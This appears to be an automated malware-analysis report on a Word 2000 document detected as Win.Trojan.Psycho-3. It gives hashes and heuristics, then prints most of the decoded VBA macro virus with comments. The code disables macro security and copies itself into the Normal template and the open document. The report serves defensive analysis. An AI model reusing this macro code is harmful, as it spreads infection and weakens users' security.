Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e10a1c4feb04cb0f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 40.5 KB
Created: 2000-07-08 01:48:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 7a1b8f4d96dfb0e57184683ed04f927d
SHA-1: 6927d7d95d7880aa225aed55b8e41086498b0c28
SHA-256: e10a1c4feb04cb0f00df710f8790fd7c30d224542937da75f9eb9211211e2c44
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, a common technique for executing code automatically when a document is opened. The script attempts to disable Word's macro security by writing the value 1 to Level under the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security and by setting Options.VirusProtection = False. The visible part of the script then reads its own Document_Open body from the document's code module and, after removing any existing Document_Open procedure and Option Explicit line, inserts it into the code modules of the Normal template and the active document, which is classic self-replicating macro-virus behaviour. This indicates an attempt to facilitate further malicious activity, likely the download and execution of a secondary payload, though the full script is truncated.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro, which runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 4876 bytes
    SHA-256: 6ad03e4baf3513cb6877a2f38608738bedad7145a449920a9e457b42abeca600

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    mbophhmbop = 1
    mbopl1mbop = "M"
    ' Lower Word 9.0's macro security level to 1 (Low) in the registry and silence the related prompts
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    mbopfimbop = 1
    Options.ConfirmConversions = False
    ' Code modules of the Normal template (Nt), the active document (Ad) and this document (Td)
    Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    mbop11mbop = 1
    Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    mbopsembop = 3
    Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
    mboptrmbop = 3
    mbopl2mbop = "b"
    ' The string "133", coerced to a number below as the count of lines of the macro body to copy
    mbopfnmbop = mbopfimbop & mbopsembop & mboptrmbop
    ' Find the line on which this Document_Open procedure starts
    For mbopiimbop = 1 To mbopTdmbop.countoflines
        If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then
            mbopSlmbop = mbopiimbop
            Exit For
        End If
    Next
    mbopl3mbop = "o"
    ' Read the macro's own source text (Vc) so that it can be written into other modules
    mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop))
    mboplvmbop = 97
    mbop15mbop = 15
    ' Copy the macro into the Normal template unless the template already carries its variable-name markers
    If mbopNtmbop.countoflines > 0 Then
        mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines)
        If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then
            ' Remove any existing Document_Open procedure from the template
            If InStr(LCase(mbopNlmbop), "private sub document_open()") <> 0 Then
                For mbopimbop = 1 To mbopNtmbop.countoflines
                    If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then
                        mbopnsmbop = mbopimbop
                        Exit For
                    End If
                Next
                For mbopimbop = mbopnsmbop To mbopNtmbop.countoflines
                    If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then
                        mbopnembop = mbopimbop
                        Exit For
                    End If
                Next
                mbopNtmbop.deletelines mbopnsmbop, mbopnembop
            End If
            ' Remove any Option Explicit line, which would stop the undeclared variables from compiling
            If InStr(LCase(mbopNlmbop), "option explicit") <> 0 Then
                For mbopimbop = 1 To mbopNtmbop.countoflines
                    If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then
                        mbopnsmbop = mbopimbop
                        Exit For
                    End If
                Next
                mbopNtmbop.deletelines mbopnsmbop, 1
            End If
            mbopNtmbop.addfromstring mbopVcmbop
            mbopNtmbop.Save
            mbopinmbop = mbophhmbop
        End If
    Else
        ' Empty template module: insert the macro directly
        mbopNtmbop.addfromstring mbopVcmbop
        mbopNtmbop.Save
        mbopinmbop = mbophhmbop
    End If
    mbophvmbop = 122
    mbopimbop = 1
    mbopdqmbop = Documents.Count
    ' The same procedure, applied to the active document's code module
    If mbopAdmbop.countoflines > 0 Then
        mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines)
        If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then
            If InStr(LCase(mbopAlmbop), "private sub document_open()") <> 0 Then
                For mbopimbop = 1 To mbopAdmbop.countoflines
                    If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then
                        mbopnsmbop = mbopimbop
                        Exit For
                    End If
                Next
                For mbopimbop = mbopnsmbop To mbopAdmbop.countoflines
                    If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then
                        mbopnembop = mbopimbop
                        Exit For
                    End If
                Next
                mbopAdmbop.deletelines mbopnsmbop, mbopnembop
            End If
            If InStr(LCase(mbopAlmbop), "option explicit") <> 0 Then
                For mbopimbop = 1 To mbopAdmbop.countoflines
                    If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then
                        mbopnsmbop = mbopimbop
                        Exit For
                    End If
                Next
                mbopAdmbop.deletelines mbopnsmbop, 1
            End If
            mbopAdmbop.addfromstring mbopVcmbop
            mbopiambop = mbophhmbop
        End If
    Else
        mbopAdmbop.addfromstring mbopVcmbop
        mbopiambop = mbophhmbop
    End If
    mbopl4mbop = "p"
    ' Build a random lowercase string of 1 to 15 characters (Chr(97) to Chr(122))
    Randomize
    mbop15mbop = Int((mbop15mbop - mbop11mbop + mbop11mbop) * Rnd + mbop11mbop)
    For mbopiimbop = 1 To mbop15mbop
        Randomize
        mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop))
    Next
    mbopd2mbop = 9
    ' Re-read this document's whole module and begin deleting lines from it; the preview is cut off here
    mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines)
    mbopTdmbop.deletelines 1, mbopTdmbop.cou
... (truncated)